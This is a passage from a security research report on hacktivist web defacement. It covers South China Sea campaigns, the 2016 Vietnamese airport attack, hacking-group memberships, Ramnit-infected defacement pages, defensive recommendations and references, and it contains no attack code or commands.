huge risk. Potentially, attackers could change the name servers of domain names, government domain names would have resolved to invalid IP addresses, and important sites would have been inaccessible to the public. 38 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 39. Information leaked on Pastebin On May 25, 2013, Filipino hackers attacked 31 .tw sites in a campaign titled #OpTaiwan as a response to #OpPhilippines. The defaced pages displayed the messages, ""Stop attacking our cyberspace"" and ""Let our government handle this problem."" 39 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 40. Web defacement pages for #OpTaiwan Defacements over Territory Six countries\xe2\x80\x94China, Taiwan, Philippines, Vietnam, Malaysia, and Brunei\xe2\x80\x94are contesting several islands and features, rock outcrops, sandbars, and reefs in the South China Sea. Over the last few years, the tension between China and Vietnam, and China and Philippines has increased. China has taken aggressive action, from coast guard patrols to building facilities and installations in various contested areas. This has sparked defacement activities by several groups from Philippines, Vietnam, and China against their rival countries' websites. Attacker Team \xe8\xb6\x8a\xe5\x8d\x97\xe5\x9b\xbd\xe5\xae\xb0\xe7\x9b\xb8 oaddah ZeSn YoCo Smart Nama Defacer AnonReaper BloodSecurity HukbalaHack Anonymous Philippines AlfabetoVirtual 1937cn 1937cn Anonymous Philippines Silic Group Anonymous Philippines Anonymous Philippines BloodSecurity Anonymous Philippines Anonymous Philippines 1937cn Figure 41. Top defacers participating in South China Sea defacements, and the groups they belong to 40 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Early Attacks in 2011 Chinese marine surveillance vessels cut the cables of Vietnamese oil survey vessels in the South China Sea23. This incident triggered defacement attacks that started on June 3, 2011. A Vietnamese defacer 'Mr.N - Cubi11' attacked Chinese government websites. The page displayed Vietnamese patriotic slogans like ""Vietnamese People is Willing to Sacrifice to Protect the Sea, Sky, and Nation."" More Vietnamese defacers joined this campaign after24. Figure 42. Vietnamese defacer page From June 4, 2011, Chinese defacers started to retaliate by attacking .vn websites. Hongke Union (HUC), a well-known Chinese hacktivist group, mobilized its members and launched a series of attacks. Over 30 .gov.vn sites were defaced. 41 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 43. Chinese defacers retaliate After completing the attacks, the HUC sent out a summary reporting that their attacks were from June 4 to June 5, two function groups were created (one for DDoS, one for defacement), and several QQ chat groups and YY chat channels were created to coordinate attacks25. Some non-HUC hackers also joined the attack, compromising over 1,000 sites. Most of the victims suffered DDoS attacks and defacement. One popular Vietnamese search engine site was inaccessible for five hours. During the attacks, HUC found Vietnamese defacers attacking .cn sites. Chinese hacker group Silic also joined the retaliation. In their deface pages, Silic claimed that ""(Vietnamese defacers) first stir up trouble, we just attack back."" This group attacked 98 .vn websites on June 8. Most victims were .gov.vn sites26. 42 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 44. Silic Group defacement page OpChinaDown, 2012 On April 10, 2012, a standoff between the Philippine Navy and Chinese maritime surveillance ships over the disputed Scarborough Shoal (Huangyan in Chinese) in the South China Sea caused tension between the two countries. In response, Chinese defacers compromised the website of the University of the Philippines on April 20, 2012, leaving a message that claimed, \xe2\x80\x9cWe come from China! Huangyan Island is Ours\xe2\x80\x9d. 43 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 45. Defaced page of University of the Philippines The defacer group ""Anonymous #OccupyPhilippines"" responded on the same day, compromising several .cn sites. The statement ""Scarborough Shoal is ours!"" was prominent on the deface page27. Three days later, on April 23, the government of the Philippines claimed that two of its sites suffered DDoS attacks coming from Chinese IP addresses\xe2\x80\x94an apparent retaliatory attack from China. Defacements escalated quickly, triggered by the DDoS attacks28. 44 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 46. Page from #OccupyPhilippines On the same day, OccupyPhilippines and PrivateX launched a joint attack operation ""#OpChinaDown"". They attacked .gov.cn sites and posted DB schema and login credentials of victim sites on Pastebin. On April 25, the Silic group (the same organization that attacked .vn sites in 2011) joined the web defacement campaign and targeted .gov.ph sites. Besides derogatory statements against Philippine defacers, the page allowed visitors to leave messages on it. Over the course of 3 hours, over 30 visitors left messages on the defaced pages29. 45 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 47. Silic defacement page, where you can leave messages Chinese hacktivism group 1937cn joined the defacement war on June 1, 2012. This group created a very long deface page to convince viewers to believe in their message. 1937cn spread that page across 173 sites in five days. StopReclamation and OpChina, 2015 China started reclamation and building on the Spratly archipelago of the South China Sea in April 201530. This action caused a wave of defacement attacks. BloodSec, a Philippine defacer group, launched a #StopReclamation campaign on April 26, 2015. 46 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 48. BloodSec defacement page Tensions escalated a month later. Posting on Pastebin31, defacers from the Philippines and Vietnam declared the beginning of an #OpChina campaign on May 28, 2015. In the announcement, they called themselves ""the united hackers from the Philippines and Vietnam,"" aiming to ""protest your (China) unjust actions over the South China Sea"". At the end of the announcement, they left a note that read ""Expect us! 5/30/2015"". Figure 49. Joint message from Vietnamese and Filipino hackers, and their defacement pages This is the first time defacers from the two South East Asian countries united for a common political cause. A series of attacks hit .cn sites on the date stated in their warning message\xe2\x80\x94August 30, 2015. Most of the victims were .gov.cn sites. The message left by the group Anonymous Philippines asked the Chinese 47 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 50. Retaliation from Chinese hackers On the same day, Chinese defacer team ""1937cn"" retaliated by defacing .vn sites, and blamed it on the joint action of defacers from Philippines and Vietnam. 1937cn also claimed that ""South China Sea is China's inherent territory."" 1937cn's response was very quick\xe2\x80\x94they likely noted the joint announcement of the defacers from the Philippines and Vietnam, and carefully prepared the retaliation. Attacks on Vietnamese Airports, 2016 On July 12, 2016, the Hague Permanent Court of Arbitration ruled in favor of the Philippines against China in an arbitration case about the disputes in the South China Sea. The ruling triggered a series of cyberattacks against Vietnam32. On July 29, 2016, the Chinese hacker group 1937cn attacked two major airports in Vietnam and the website of Vietnam Airlines33. They defaced the home page with the same page used in 2015 during the #OpChina defacement campaign. Then the hacker group leaked client information of Vietnam Airlines34. This was not the first time 1937cn attacked Vietnam Airlines; the group also launched a similar attack on May 30, 2015. government to ""stop the reclamation, do not put or establish any structure in that location."" At the same time, ""AnonGhost"" from Vietnam put out the message, ""Stop the infringements of sovereignty island."" 48 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 51. Client information from Vietnam Airlines The Civil Aviation Administration of Vietnam reported several attacks, supposedly from 1937cn team, on two Vietnam airports within the same day. The IT system for the check-ins of Vietnam Airlines at Tan Son Nhat International Airport was attacked and stopped working. The deface page, which was the same page used on the Vietnam Airlines website, replaced the flight information screens at Noi Bai International Airport. The speaker system at Noi Bai airport was also compromised by hackers for a few minutes, during which the speakers broadcast an announcement against territory dispute. According to the Civil Aviation Administration of Vietnam, the attack caused the delay of 100 flights, affecting thousands of passengers35. This incident might hint at future hacktivism trends: to reach a wider audience, hacktivists could potentially broaden their targets from traditional websites to critical infrastructures such as airports. 49 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Hacking Groups\xe2\x80\x99 Connections and Campaigns Deface groups are formed by a loose affiliation between hackers. They can be defined as ""loose"" since hackers can be affiliated with one or more of these hacking groups, even across territories. Indonesian Code Party AnonCoders Myanmar Noob Hackers gunz_berry Moroccan Ethical Hackers Virus Noir darkshadow-tn Albania Attacker dr.t3rror Fallaga Team Anonymous Albania Arab Warriors Team Anonghosts Figure 52. The hacking group AnonCoders As an example, see the group AnonCoders, which lists gunz_berry, Virus Noir, darkshadow-tn, Albania Attacker and dr.t3rr0r as its core members. However, gunz_berry is also affiliated with Indonesian Code Party, while Virus Noir is affiliated with Moroccan Ethical Hackers, darkshadow-tn with Fallaga Team, and dr.t3rr0r with Myanmar Noob Hackers. Albania Attacker is affiliated with three other groups\xe2\x80\x94Anonymous Albania, Arab Warriors Team, and Anonghosts. AnonCoders shows how hackers can also be members of various groups, and how hackers from different countries can form a group. Other examples showing the liquidity of group membership are Pakistan's two biggest hacking groups: ZCompany Hacking Crew and Muslim Liberation Army. Both have fairly large teams; ZCompany Hacking Crew has at least 30 members, and Muslim Liberation Army has around 26. Below you can see seven hackers who are members of both groups simultaneously, as we've seen defacements made by both teams acknowledging the hackers in their defacement pages within the same time frame. 50 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks ZCompany Hacking Crew Toshiro Sniper MongoOse Don Milan Milo Nabeel XtreMiSt HawkPak Jaguars Angel De Decorum Unknown Tazii Hothead Chf Code HardHunter RoCk Silent Hell Bozz error Zolo Zarrar Velocity Madni Zulfi Dropper Gen Hard Hunter Zology Xaha Unknown Hax TriCk aka Saywhat?MasterMind Muslim Liberation Army Papaas Dorian Gray Radical Assassin Metallic Xenon Syed Zadaa (Mindy) PCCS PCF Bozz Hacker Ibrar Buttz Killer Mind Silence Destiny Cobra Black KillerMind Haxor Faisy Ali LaghariJerry Hassan HyP3r-Boy fAchO Nabeel (Master Mind) Zarb-E-Momin Figure 53. Members of the ZCompany Hacking Crew and the Muslim Liberation Army Collectives Hacking groups can also band together to form bigger groups or collectives. The well-known group Anonymous is a model for this. They can rightly be considered the biggest hacking collective in the world based on the numerous hacking groups who identify and associate themselves with the name \xe2\x80\x9cAnonymous\xe2\x80\x9d. On a smaller scale, a collective can be formed simply to support a campaign. Take, for example, the defacements done by Bangladeshi hackers against Indian websites, triggered by the Cricket World Cup. The collective Rise of the Tigers was borne out of various Bangladeshi hacking groups working together: 3xp1r3 Cyber Army, Blacksmith Hacker's Team, Cyb3r Command0S, Bangladesh Grey Hat Hackers, Bangladesh Black HAT Hackers, Cyber Sword and Bangladesh Script Kidde Hackers. 51 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Campaign Recruitment and Tools Certain individuals or groups loosely organize hacktivism campaigns. They set time frames for a particular campaign, and even use social media to coordinate and launch these campaigns. Figure 54. Facebook calendar used to schedule defacement activities Figure 55. Social media post used to spread templates for defacement scripts 52 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks They use calendar event features like Facebook Events to organize campaigns. They also advertise campaigns on their team pages and actively recruit other hackers and hacking groups to participate. Tools, targets, and defacement page templates are also shared openly by those participating in a campaign. Figure 56. Tools spread through social media and sharing sites 53 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Certain groups also set up team websites to host content, post announcements, and facilitate discussions through forums. These commonly have sections for tutorials, tools, and kits. Figure 57. Different community sites hosting forums, downloads, news and more 54 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Auxiliary Activities of Defacement Groups Besides tools and defacement templates, these groups also share attack techniques. For example, groups post hacking tutorials on GitHub and upload tutorial videos to streaming sites. Figure 58. Tools and tutorials for different hacking activities shared by defacers 55 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Defacers are also contributing to Exploit-DB, which is is an open-source database for sharing exploit codes and security papers. To find the number of defacers that are also active on Exploit-DB, we compared our list of known defacers against this list of authors36 from Exploit-DB: \xe2\x80\xa2 Total defacer/hacker alias that are also listed as Exploit-DB authors: 790 of 7,858 (10.05%) \xe2\x80\xa2 PoC submitted by possible defacers: 6,380 of 36,576 (17.44%) InjEctOr5 CoBRa_21 bd0rk EgiX Mr.SQL HACKERS PAL JosS AtT4CKxT3rR0r1ST t0pP8uZz CWH Underground Hussin X cr4wl3r ajann ZoRLu indoushka 63 64 65 67 68 69 74 96 105 115 121 130 204 221 294 Figure 59. Top 15 defacers who shared exploit codes Web Apps Remote DOS Local Shellcode 83.53% 5.72% 5.63% 4.26% 0.86% Figure 60. Breakdown of exploit types submitted by possible defacers 56 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Escalating into Real-World Terrorism Activities Hackers who participate in defacement and also other forms of hacking can also segue into more serious crimes, possibly also driven by real-world disputes and political agendas. An example would be the case of Team P0ison's founder Junaid Hussain (TriCk), who started notable defacements in 2010. Figure 61. Sample of defaced pages done by TriCk supporting Free Kashmir Hussain was arrested in 2014 for hacking into Katie Kay's (special advisor to British Prime Minister Tony Blair) email account and leaking PM Blair's personal information37. After six months in jail, Junaid Hussain traveled to Syria and joined ISIS. He took the name Abu Hussain al-Britani, and is believed to be the person behind the hack of U.S. Central Command's Twitter and YouTube accounts. He is also believed to have been killed in a US air strike in Syria in 201538. Defaced Sites as Unwitting Infection Sources Aside from actively committing criminal activities, defacement pages can unwitting carriers of malware code. In the course of our research, we saw the malware Ramnit distributed through malicious websites or packaged as fake software installers. Ramnit is an actively developed malware family whose main goal is to steal banking credentials. It also evolved to include worm propagation capabilities, as well as the ability to infect files, including HTML files. Ramnit does this by appending a VBscript code at the end of the HTML file found in the affected machine. The infected HTML file contains code to install a copy of the Ramnit malware. Unfortunately, some defacers\xe2\x80\x99 machines were infected by Ramnit and had their web defacement templates infected to include the malicious VBscript. This, in turn, made their defacement pages unwitting distributors of the Ramnit malware. 57 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks \xe6\x98\x9f ll_azab_siyah_ll KkK1337 xamd fallaga team dulava! Anonymous Arabe Sp@rK CoD3R by:\xe5\xa4\xa7 Team_CC HakANT MrCyberError404 By \xe5\x88\xba\xe5\xbf\x83 Turkhackteam.Org Owner Dzz UMCA chinafans SnIpEr_SA Zalim Baws-DZ AnonGhost BlackVirus Anwar Dreno Med Max By\xef\xbc\x9a\xe5\xb0\x8f\xe5\xba\xb7 gunz_berry H.M.L-\xe5\xb0\x8f\xe5\x8c\x97 Fallaga Team Cyb3r_Sw0rd stupid 51 53 55 56 61 62 68 73 76 78 79 87 93 95 116 118 127 127 129 136 145 152 236 258 276 279 310 399 1,289 1,708 Based on our records, 9,726 defacements were seen to include the Ramnit VBscript. Below are the top 30 defacers who were infected by Ramnit and had their compromised web defacement pages distribute the malware. Most of the defacers were either from Arabic-speaking countries in the Middle East and North Africa or from China. In a serendipitous turn of events, the top defacer that unwittingly spread Ramnit goes by the nickname ""stupid"". Figure 62. Defacers who were unknowingly spreading Ramnit through their defacement pages 58 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Conclusion As seen in the examples above, real-world conflict can trigger web defacement on a large scale. One event can lead to a campaign that brings hacking groups together, and large collectives can sustain defacement campaigns for long periods of time. Most are politically or religiously motivated, and attackers are typically keen to express fervent patriotism over specific causes. While these web defacement activities seem relatively benign, it is plausible for defacers to move on to other hacking activities and criminal behavior. Web Defacements and IoT Web defacements are going to continue in the foreseeable future, and may even become more prevalent as more Internet of Things (IoT) devices are connected online. Figure 63. Router control panel replaced with a hacker\xe2\x80\x99s page 59 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks The above screenshot shows a defaced router control panel, changing the title of the HTML page to ""You hacked from iraq(fb\\arakan"". A lot of people may not realize that IoT devices have stripped down versions of web servers that host their control panels and management consoles. The setup is something that would be relatively easy for a defacer to exploit and compromise. In the case of the router defacement above, the attacker might not even have known that he was able to deface a non-traditional/IoT website. Exploits for vulnerabilities of common web applications or server components are also applicable and effective on non-traditional/IoT websites. It would be simple for a defacer to transition into compromising connected IoT devices. With the growing number of IoT devices, it might be appealing for defacers to continue down that route. Hacktivism in the Future There are various vulnerabilities that attackers exploit to deface websites to push their specific agenda. But despite compromising these web sites that contain potentially sensitive data (PII, account credentials, transaction histories, etc), most defacers have yet to abuse their access further. They are seemingly content just to deface the site. However, the delineation between pure web defacement and cybercriminal or cyberespionage activity is disappearing. Hackers are now increasingly involved in developing web shells (backdoors to maintain access to compromised web servers), and also delving into doxing and leaking stolen data. After defacing websites, the next step would seem to be capitalizing on the available information on compromised sites. Apart from individuals, defacement groups have yet to monetize their activities. According to our data, 99.9% of the web defacement pages are harmless. Pages found containing malicious code are mostly infected by VBS_RAMNIT.SMC. These pages were unknowingly infected, and not intentionally put online to spread malicious code. These defacers had their templates infected by the malware and unwittingly spread the Ramnit malware. A troubling scenario is if these defacement groups decide to monetize their successful hacks by, for example, installing malicious redirections or exploit code in the defacement pages that would then install ransomware. As previously mentioned, so far these defacements have been benign and motivated by real-world conflicts or political agendas. However, cybercriminals could easily use hacks for profit-driven criminal activities. We have already seen some instances of this. There were reports of Indian hackers targeting Pakistani servers and users to install ransomware for ""patriotic"" purposes39. If this continues and escalates, then the line between defacers, hacktivists, and cybercriminals will become even more blurred. 60 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks How can enterprises protect their sites? Based on the major vulnerabilities used by defacers, there are simple steps that can secure servers against these threats. If practiced and deployed consistently, these tips can help enterprises have long-term security: \xe2\x80\xa2 Ensure that basic security policies are employed and maintained long- term: strong passwords, proper administration security policies, and correct configuration. \xe2\x80\xa2 Use web application firewalls to filter, monitor, and block malicious traffic. Security is necessary at the web application level. \xe2\x80\xa2 Practice secure coding. Organizations must implement secure coding standards on all their sites. \xe2\x80\xa2 Regularly use testing tools to ensure deployed codes are secure. \xe2\x80\xa2 Make patching systems and networks a part of standard policy. This prevents cybercriminals from exploiting vulnerabilities in unpatched/ outdated software. \xe2\x80\xa2 Regularly scan web applications for vulnerabilities: Organizations need to check their web apps for vulnerabilities as these can lead to SQL injection and cross-site scripting attacks. \xe2\x80\xa2 Use multi-layered protection that secures vulnerable websites from the common attacks used by defacers. Solutions like Trend Micro\xe2\x84\xa2 Deep Security\xe2\x84\xa2 and Vulnerability Protection provides virtual patching that protects servers and endpoints from threats that may abuse vulnerabilities. 61 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks References 1. Zone-H archives. (n.d.) Zone-H Unrestricted Information. Last accessed on 11 November 2017 at http://www.zone-h.org/ 2. Ibid 3. Hack CN. (n.d.). \xe5 \xa8\xe7\x90\x83\xe8\xa2\xab\xe9\xbb\x91\xe7\xab\x99\xe7\x82\xb9\xe7\xbb\x9f\xe8\xae\xa1|\xe9\xbb\x91\xe5\xae\xa2\xe6\x8a\x80\xe6\x9c\xaf\xe6\xa3\x80\xe6\xb5\x8b|\xe9\xbb\x91\xe5\xae\xa2\xe5 \xa5\xe4\xbe\xb5\xe6\x94\xbb\xe5\x87\xbb. Last accessed on 17 November 2017 at http://www.hack-cn. com/. 4. http://www.mirror-zone.org (offline) 5. H4ck Mirror. (n.d.) Hack Mirror. Last accessed on 16 November 2017 at http://www.hack-mirror.com/. 6. http://www.mydeface.com (offline) 7. BBC Newsround. (20 February 2015). BBC Newsround. \xe2\x80\x9cGuide: Why are Israel and the Palestinians fighting over Gaza?\xe2\x80\x9d Last accessed 16 November 2017 at http://www.bbc.co.uk/newsround/20436092. 8. Al-Islam. (n.d.) AI-Islam.org. \xe2\x80\x9cThe Battle of Badr\xe2\x80\x9d. Last accessed 14 Nov 2017 at https://www.al-islam.org/articles/battle-badr. 9. Yifa Yaakov. (5 August 2014). The Times of Israel. \xe2\x80\x9cAfter 29 days, Operation Protective Edge by the numbers\xe2\x80\x9d. Last accessed 17 November 2017 at https://www.timesofisrael.com/after-29-days-operation-protective-edge-by-the-numbers/. 10. ABC. (8 January 2015). ABC News. \xe2\x80\x9cCharlie Hebdo shooting: 12 people killed, 11 injured, in attack on Paris offices of satirical newspaper\xe2\x80\x9d. Last accessed 14 November 2017 at http://www.abc.net.au/news/2015-01-07/charlie-hebdo-satirical- newspaper-shooting-paris-12-killed/6005524. 11. AFP/Reuters. (16 July 2017). Deutsche Welle. \xe2\x80\x9c'Cyber Army' hacker arrested, says Bulgaria\xe2\x80\x9d. Last accessed 17 November 2017 at http://www.dw.com/en/cyber-army-hacker-arrested-says-bulgaria/a-18586433. 12. Rifat Fareed. (27 Ovtober 2017) Al Jazeera. \xe2\x80\x9c'Black day' in Kashmir marks 1947 Indian army arrival\xe2\x80\x9d. Last accessed 17 November 2017 at http://www.aljazeera.com/news/2017/10/day-kashmir-marks-1947-indian-army-arrival-171027122649223.html. 13. Maps of India. (n.d.) Maps of India. \xe2\x80\x9c26th October 1947: Maharaja Hari Singh agrees to the accession of Jammu and Kashmir to India\xe2\x80\x9d Last accessed 16 November 2017 at https://www.mapsofindia.com/on-this-day/26th-october-1947-maharaja-hari- singh-agrees-to-the-accession-of-jammu-and-kashmir-to-india. 14. Aijaz Hussain. (10 December 2013). The San Diego Union Tribune. \xe2\x80\x9cActivists, families protest Kashmir disappearances\xe2\x80\x9d. Last accessed 13 November 2017 at http://www.sandiegouniontribune.com/sdut-activists-families-protest-kashmir- disappearances-2013dec10-story.html. 15. Rupam Jain. (19 December 2016) Reuters. \xe2\x80\x9cIndia indicts Pakistan-based militants over Pathankot air base attack\xe2\x80\x9d Last accessed 17 November 2017 at http://in.reuters.com/article/india-pakistan-attack/india-indicts-pakistan-based-militants- over-pathankot-air-base-attack-idINKBN1480QO. 16. Hari Kumar and Geeta Anand. (18 September 2016). The New York Times. \xe2\x80\x9c17 Indian Soldiers Killed by Militants in Kashmir\xe2\x80\x9d Last accessed 17 November 2017 at https://www.nytimes.com/2016/09/19/world/asia/17-indian-soldiers-killed-by-militants- in-kashmir.html. 17. Shubhajit Roy. (24 September 2015). The Indian Express. \xe2\x80\x9cMake seven changes to your Constitution: India tells Nepal\xe2\x80\x9d. Last accessed 2 November 2017 at http://indianexpress.com/article/world/neighbours/make-seven-changes-to-your-constitution- address-madhesi-concerns-india-to-nepal/. 18. Medecins Sans Frontieres. (26 April 2016). MSF.org. \xe2\x80\x9cSyria: Update on airstrike at Al Quds hospital\xe2\x80\x9d. Last accessed 17 November 2017 at http://www.msf.org/en/article/syria-update-airstrike-al-quds-hospital. http://www.mirror-zone.org http://www.mydeface.com http://www.bbc.co.uk/newsround/20436092 https://www.al-islam.org/articles/battle-badr https://www.timesofisrael.com/after-29-days-operation-protective-edge-by-the-numbers/ http://www.abc.net.au/news/2015-01-07/charlie-hebdo-satirical-newspaper-shooting-paris-12-killed/6005524 http://www.abc.net.au/news/2015-01-07/charlie-hebdo-satirical-newspaper-shooting-paris-12-killed/6005524 http://www.dw.com/en/cyber-army-hacker-arrested-says-bulgaria/a-18586433 http://www.aljazeera.com/news/2017/10/day-kashmir-marks-1947-indian-army-arrival-171027122649223.html https://www.mapsofindia.com/on-this-day/26th-october-1947-maharaja-hari-singh-agrees-to-the-accession-of-jammu-and-kashmir-to-india https://www.mapsofindia.com/on-this-day/26th-october-1947-maharaja-hari-singh-agrees-to-the-accession-of-jammu-and-kashmir-to-india http://www.sandiegouniontribune.com/sdut-activists-families-protest-kashmir-disappearances-2013dec10-story.html http://www.sandiegouniontribune.com/sdut-activists-families-protest-kashmir-disappearances-2013dec10-story.html http://in.reuters.com/article/india-pakistan-attack/india-indicts-pakistan-based-militants-over-pathankot-air-base-attack-idINKBN1480QO http://in.reuters.com/article/india-pakistan-attack/india-indicts-pakistan-based-militants-over-pathankot-air-base-attack-idINKBN1480QO https://www.nytimes.com/2016/09/19/world/asia/17-indian-soldiers-killed-by-militants-in-kashmir.html https://www.nytimes.com/2016/09/19/world/asia/17-indian-soldiers-killed-by-militants-in-kashmir.html http://indianexpress.com/article/world/neighbours/make-seven-changes-to-your-constitution-address-madhesi-concerns-india-to-nepal/ http://indianexpress.com/article/world/neighbours/make-seven-changes-to-your-constitution-address-madhesi-concerns-india-to-nepal/ http://www.msf.org/en/article/syria-update-airstrike-al-quds-hospital 62 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks 19. Die Morina. (2 Match 2017) Balkan Transitional Justice. \xe2\x80\x9cMitrovica\xe2\x80\x99s Flashpoint Bridge Symbolises Kosovo\xe2\x80\x99s Divisions\xe2\x80\x9d. Last accessed 17 November 2017 at http://www.balkaninsight.com/en/article/mitrovica-s-flashpoint-bridge-symbolises-kosovo-s- divisions-03-01-2017. 20. Tarra Quismundo. (16 April 2016). Inquirer. \xe2\x80\x9cPCG men ordered to pay Taiwan family\xe2\x80\x9d. Last accessed 17 November 2017 at http://globalnation.inquirer.net/138653/pcg-men-ordered-to-pay-taiwan-family. 21. Sofia Wu. (13 May 2013) Focus Taiwan. \xe2\x80\x9cShooting ignites Taiwan-Philippines cyber war \xe2\x80\x9c, Last accessed 16 November 2017 at http://focustaiwan.tw/news/atod/201305130041.aspx. 22. Clifford Trigo. (11 May 2013). Pinoy Hack News. \xe2\x80\x9cPinoy Vendetta sends warning message to Taiwan, defaces 5 websites\xe2\x80\x9d. Last accessed 17 November 2017 at https://www.pinoyhacknews.com/pinoy-vendetta-sends-warning-message-to-taiwan- defaces-5-websites. 23. Petro Vietnam. (1 June 2011) PetroVietnam. \xe2\x80\x9cChinese ships destroy Vietnam sea cable\xe2\x80\x9d. Last accessed 17 November 2017 at https://www.youtube.com/watch?v=w1H6zcuXjJ8. 24. ChinaAZ. (8 June 2011). Cheng Cold Blog. \xe2\x80\x9cMany websites in the South China Sea were attacked by Vietnamese hackers and Chinese hijackers counterattacked\xe2\x80\x9d. Last accessed 17 November 2017 at http://www.bj3gweb.com/Link201106_WebAttack_ ChinaAndVietnam.html. 25. Ibid 26. Kafan. (5 June 2011) Kafan.cn. \xe2\x80\x9cMany domestic websites were attacked by Vietnamese hackers\xe2\x80\x9d. Last accessed on 16 November 2017 at http://bbs.kafan.cn/thread-999960-1-1.html. 27. Xiao Bian. (6 May 2012). Freebuf. \xe2\x80\x9cMy Filipino Maid is a Hackers - China and the Philippines network war\xe2\x80\x9d. Last accessed 16 November 2017 at http://www.freebuf.com/news/913.html. 28. Edwin Lacierda. (23 April 2012). Official Gazette. \xe2\x80\x9cStatement of Presidential Spokesperson Edwin Lacierda\xe2\x80\x9d. Last accessed on 16 November 2017 at http://www.officialgazette.gov.ph/2012/04/23/statement-of-the-presidential-spokesperson-on-the- denial-of-service-attack-on-pcdspo-maintained-websites-april-23-2012/. 29. Rappler. (25 April 2012) Rappler. \xe2\x80\x9cDBM website hacked\xe2\x80\x9d. Last accessed on 24 November 2017 at https://www.rappler.com/ nation/4341-dbm-website-hacked. 30. Reuters. (9 April 2015) CNBC. \xe2\x80\x9cChina mounts detailed defence of South China Sea reclamation\xe2\x80\x9d. Last accessed on 223 November 2017 at http://www.cnbc.com/2015/04/09/china-mounts-detailed-defence-of-south-china-sea-reclamation.html. 31. Pastebin. (28 May 2015) #OpChina Official Index. Last accessed 15 November 2017 at https://pastebin.com/xii97KNy. 32. Anni Piiparinen. (22 July 2016). The Diplomat. \xe2\x80\x9cChina\xe2\x80\x99s Secret Weapon in the South China Sea: Cyber Attacks\xe2\x80\x9d. Last accessed 18 November 2017 at https://thediplomat.com/2016/07/chinas-secret-weapon-in-the-south-china-sea-cyber-attacks/. 33. Vietnam News (29 July 2016). Vietnam News. \xe2\x80\x9cChinese hackers attack VN\xe2\x80\x99s airports and Vietnam Airlines\xe2\x80\x99 website\xe2\x80\x9d. Last accessed 16 November 2017 at http://vietnamnews.vn/society/300416/chinese-hackers-attack-vns-airports-and-vietnam- airlines-website.html#vecZdAWfcqd8iKGz.97. 34. Tara Seals. (29 July 2016). Info-Security Magazine. \xe2\x80\x9cChinese Hackers Attack Airports Across Vietnam\xe2\x80\x9d. Last accessed 15 November 2017 at https://www.infosecurity-magazine.com/news/chinese-hackers-attack-airports/. 35. Vietnam News (29 July 2016). Vietnam News. \xe2\x80\x9cChinese hackers attack VN\xe2\x80\x99s airports and Vietnam Airlines\xe2\x80\x99 website\xe2\x80\x9d. Last accessed 16 November 2017 at http://vietnamnews.vn/society/300416/chinese-hackers-attack-vns-airports-and-vietnam- airlines-website.html#vecZdAWfcqd8iKGz.97. http://www.balkaninsight.com/en/article/mitrovica-s-flashpoint-bridge-symbolises-kosovo-s-divisions-03-01-2017 http://www.balkaninsight.com/en/article/mitrovica-s-flashpoint-bridge-symbolises-kosovo-s-divisions-03-01-2017 http://globalnation.inquirer.net/138653/pcg-men-ordered-to-pay-taiwan-family http://focustaiwan.tw/news/atod/201305130041.aspx https://www.pinoyhacknews.com/pinoy-vendetta-sends-warning-message-to-taiwan-defaces-5-websites https://www.pinoyhacknews.com/pinoy-vendetta-sends-warning-message-to-taiwan-defaces-5-websites https://www.youtube.com/watch?v=w1H6zcuXjJ8 http://www.bj3gweb.com/Link201106_WebAttack_ChinaAndVietnam.html http://www.bj3gweb.com/Link201106_WebAttack_ChinaAndVietnam.html http://bbs.kafan.cn/thread-999960-1-1.html http://www.freebuf.com/news/913.html http://www.officialgazette.gov.ph/2012/04/23/statement-of-the-presidential-spokesperson-on-the-denial-of-service-attack-on-pcdspo-maintained-websites-april-23-2012/ http://www.officialgazette.gov.ph/2012/04/23/statement-of-the-presidential-spokesperson-on-the-denial-of-service-attack-on-pcdspo-maintained-websites-april-23-2012/ https://www.rappler.com/nation/4341-dbm-website-hacked https://www.rappler.com/nation/4341-dbm-website-hacked http://www.cnbc.com/2015/04/09/china-mounts-detailed-defence-of-south-china-sea-reclamation.html https://pastebin.com/xii97KNy https://thediplomat.com/2016/07/chinas-secret-weapon-in-the-south-china-sea-cyber-attacks/ http://vietnamnews.vn/society/300416/chinese-hackers-attack-vns-airports-and-vietnam-airlines-website.html#vecZdAWfcqd8iKGz.97 http://vietnamnews.vn/society/300416/chinese-hackers-attack-vns-airports-and-vietnam-airlines-website.html#vecZdAWfcqd8iKGz.97 https://www.infosecurity-magazine.com/news/chinese-hackers-attack-airports/ http://vietnamnews.vn/society/300416/chinese-hackers-attack-vns-airports-and-vietnam-airlines-website.html#vecZdAWfcqd8iKGz.9 http://vietnamnews.vn/society/300416/chinese-hackers-attack-vns-airports-and-vietnam-airlines-website.html#vecZdAWfcqd8iKGz.9 63 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks 36. GitHub. The Official Exploit Database Repository. Last accessed on 16 November 2017 at https://github.com/offensive- security/exploit-database. 37. Gianlucca Mezzofiore. (2 July 2014). International Business Times. \xe2\x80\x9cTeam Poison's Junaid Hussain Jailed for Tony Blair Hack and Phone Bombing Anti-Terror Hotline\xe2\x80\x9d. 